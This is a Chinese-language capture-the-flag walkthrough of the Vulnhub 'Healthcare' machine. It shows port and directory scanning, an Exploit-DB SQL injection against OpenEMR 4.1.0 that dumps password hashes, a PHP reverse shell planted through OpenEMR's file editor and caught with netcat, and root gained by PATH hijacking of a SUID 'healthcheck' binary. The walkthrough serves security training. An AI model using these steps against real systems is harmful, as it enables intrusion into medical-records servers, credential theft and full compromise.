Healthcare
作者: jason huawen
靶機資訊
名稱:
地址:
識別目標主機IP地址
─(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:69:f3:d5 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:f6:d1:32 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具識別目標主機的IP地址為192.168.56.254
NMAP掃描
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3d
80/tcp open http Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
|_/all_our_e-mail_addresses /admin/ /
|_http-title: Coming Soon 2
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
NMAP掃描結果表明目標主機有2個開放埠:21(ftp)、80(http)
獲得Shell
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
Name (192.168.56.254:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit ProFTPD
-----------------------------------------------------------------
-
FTP不允許匿名訪問
-
FTP服務為ProFTPD,可能存在mod_copy漏洞
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ curl http://192.168.56.254/robots.txt
# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /
robots.txt存在/admin/條目,但是訪問該目錄,卻回傳頁面不存在的錯誤,
──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-04-21 22:08:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan 6 01:21:38 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-04-21 22:09:10 (GMT-4) (57 seconds)
---------------------------------------------------------------------------
nikto掃描結果認為存在shellcode漏洞,查詢得到漏洞利用代碼:
https://www.exploit-db.com/exploits/34900
但是該代碼并不能正常作業,只能另外尋找突破口,
接下來掃描一下目錄:
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,html,txt,sh,php
[+] Timeout: 10s
===============================================================
2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
/index.html (Status: 200) [Size: 5031]
/index (Status: 200) [Size: 5031]
/.html (Status: 403) [Size: 1000]
/css (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
/js (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
/vendor (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
/favicon (Status: 200) [Size: 1406]
/robots (Status: 200) [Size: 620]
/robots.txt (Status: 200) [Size: 620]
/fonts (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
/gitweb (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
/.html (Status: 403) [Size: 1000]
/phpMyAdmin (Status: 403) [Size: 59]
/server-status (Status: 403) [Size: 1000]
/server-info (Status: 403) [Size: 1000]
/openemr (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]
掃描出/openemr目錄,其他目錄沒有什么價值,
訪問該目錄,可知CMS為OpenEMR, 版本為4.1.0,查詢是否存在相關漏洞
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit openEMR 4.1.0
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 4.1.0 - 'u' SQL Injection | php/webapps/49742.py
Openemr-4.1.0 - SQL Injection | php/webapps/17998.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit -m php/webapps/49742.py
Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
URL: https://www.exploit-db.com/exploits/49742
Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Healthcare/49742.py
將漏洞利用代碼拷貝至作業目錄,執行該代碼
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ python 49742.py
____ ________ _______ __ __ ___ ____
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_)
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike
[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d
利用在線網站解密:
https://md5decrypt.net/en/Sha1/#answer
得到admin的密碼為ackbar, 另外一個用戶密碼為medical
登錄:
http://192.168.56.254/openemr/
在administration欄目中,可以Edit file,看是否可以將shell.php代碼增加到其中一個檔案,比如:statement.inc.php,而且可以看到完整的路徑,將shell.php代碼拷貝增加到statement.inc.php后,訪問該檔案:
http://192.168.56.254/openemr/sites/default/statement.inc.php
從而在Kali Linux上得到reverse shell
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
20:50:43 up 1:55, 0 users, load average: 1.00, 1.28, 3.57
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd /home
cd /home
bash-4.1$ ls -alh
ls -alh
total 20K
drwxr-xr-x 5 root root 4.0K Jul 29 2020 .
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ..
drwxr-xr-x 27 almirant almirant 4.0K Jul 29 2020 almirant
drwxr-xr-x 31 medical medical 4.0K Nov 5 2011 medical
drwxr-xr-x 3 root root 4.0K Nov 4 2011 mysql
bash-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
從而得到了user flag
提權
看能否用前面得到的密碼切換shell到medical
bash-4.1$ su - medical
su - medical
Password: medical
[medical@localhost ~]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)
我們的猜測是正確的
[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/healthcheck有SUID位
[medical@localhost backups]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h
可以看到healthcheck會執行ifconfig,因此可以生成我們的ifconfig命令,從而實作提權
cd /tmp
[medical@localhost tmp]$ echo '/bin/bash' > ifconfig
echo '/bin/bash' > ifconfig
[medical@localhost tmp]$ chmod 777 ifconfig
chmod 777 ifconfig
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check
Scanning System
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 920K
drwxr-x--- 20 root root 4.0K Jul 29 2020 ./
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
-rw------- 1 root root 426 Jul 29 2020 .bash_history
-rw-r--r-- 1 root root 193 Sep 24 2011 .bash_profile
-rw-rw-rw- 1 root root 422 Sep 6 2011 .bashrc
drwxr-xr-x 2 root root 4.0K Sep 12 2011 .cache/
drwx------ 6 root root 4.0K Sep 12 2011 .config/
drwx------ 3 root root 4.0K Jul 19 2011 .dbus/
drwxr--r-- 2 root root 4.0K Jul 19 2011 Desktop/
-rw------- 1 root root 28 Jul 22 2011 .dmrc
drwx------ 3 root root 4.0K Sep 8 2011 Documents/
drwx------ 2 root root 4.0K Sep 6 2011 drakx/
drwx------ 4 root root 4.0K Sep 24 2011 .gconf/
drwx------ 2 root root 4.0K Sep 24 2011 .gconfd/
drwx------ 3 root root 4.0K Sep 12 2011 .gnome2/
drwx------ 2 root root 4.0K Sep 12 2011 .gnome2_private/
drwx------ 3 root root 4.0K Jul 29 2020 .gnupg/
drwx------ 2 root root 4.0K Jul 19 2011 .gvfs/
-rwxr-xr-x 1 root root 5.7K Jul 29 2020 healthcheck*
-rw-r--r-- 1 root root 182 Jul 29 2020 healthcheck.c
-rw------- 1 root root 0 Sep 11 2011 .ICEauthority
drwx------ 3 root root 4.0K Sep 6 2011 .local/
drwx------ 3 root root 4.0K Nov 5 2011 .mc/
-rw-r--r-- 1 root root 0 Oct 22 2010 .mdk-menu-migrated
-rw-r--r-- 1 root root 0 Jul 21 2011 .menu-updates.stamp
-rw------- 1 root root 6 Jul 29 2020 .mysql_history
-rw-rw-rw- 1 root root 2.1K Jul 29 2020 root.txt
-rw-r--r-- 1 root root 797K Apr 12 2020 sudo.rpm
drwx------ 2 root root 4.0K Nov 5 2011 .synaptic/
drwx------ 2 root root 4.0K Sep 11 2011 .thumbnails/
drwx------ 2 root root 4.0K Apr 21 18:54 tmp/
drwxr-xr-x 2 root root 4.0K Jul 29 2020 .xauth/
-rw-r--r-- 1 root root 1.9K Jul 6 2011 .xbindkeysrc
[root@localhost root]# cat root.txt
cat root.txt
██? ██? ██████? ██? ██? ████████?██████? ██?███████?██████? ██? ██? █████? ██████? ██████? ███████?██████? ██?
?██? ██??██????██?██? ██? ???██????██???██?██?██??????██???██? ██? ██?██???██?██???██?██???██?██??????██???██?██?
?████?? ██? ██?██? ██? ██? ██████??██?█████? ██? ██? ███████?███████?██████??██? ██?█████? ██████??██?
?██?? ██? ██?██? ██? ██? ██???██?██?██???? ██? ██? ██???██?██???██?██???██?██? ██?██???? ██???██????
██? ?██████???██████?? ██? ██? ██?██?███████?██████?? ██? ██?██? ██?██? ██?██████??███████?██? ██?██?
??? ??????? ??????? ??? ??? ????????????????????? ??? ?????? ?????? ?????????? ??????????? ??????
Thanks for Playing!
Follow me at: http://v1n1v131r4.com
root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
[root@localhost root]#
至此成功得到了root shell和root flag.
經驗教訓
- 在nikto結果得知目標可能存在shellshock后,就認定可以利用漏洞,而忽略對于web應用的正常步驟,即掃描目錄,而且需要足夠的耐心才能得到相應的目錄,否則該靶機將無解,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550874.html
標籤:其他
上一篇:web3 產品介紹: safe --多簽錢包 多人審批更放心
下一篇:返回列表